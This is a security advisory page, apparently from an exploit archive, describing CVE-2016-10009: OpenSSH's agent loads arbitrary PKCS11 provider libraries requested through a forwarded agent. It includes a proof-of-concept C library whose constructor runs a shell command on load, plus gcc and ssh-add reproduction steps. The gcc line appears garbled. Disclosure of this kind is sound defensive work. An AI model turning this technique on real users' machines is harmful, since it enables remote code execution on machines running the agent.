OpenSSH Arbitrary Library Loading

Credit: Jann Horn
Risk: High
Local: No
Remote: Yes
CWE: CWE-426

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

OpenSSH: agent protocol permits loading arbitrary libraries CVE-2016-10009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine. To reproduce the issue, first create a library that executes some command when it is loaded: $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through system() unsetenv("LD_PRELOAD"); unsetenv("LD_LIBRARY_PATH"); system("id > /tmp/test"); } $ gcc -shared -o evil_lib.c -fPIC -Wall Connect to another machine using "ssh -A". Then, on the remote machine: $ ssh-add -s [...]/ Enter passphrase for PKCS#11: [just press enter here] SSH_AGENT_FAILURE Could not add card: [...]/ At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent: $ cat /tmp/test uid=1000(user) gid=1000(user) groups=[...] This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: Jann Horn


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top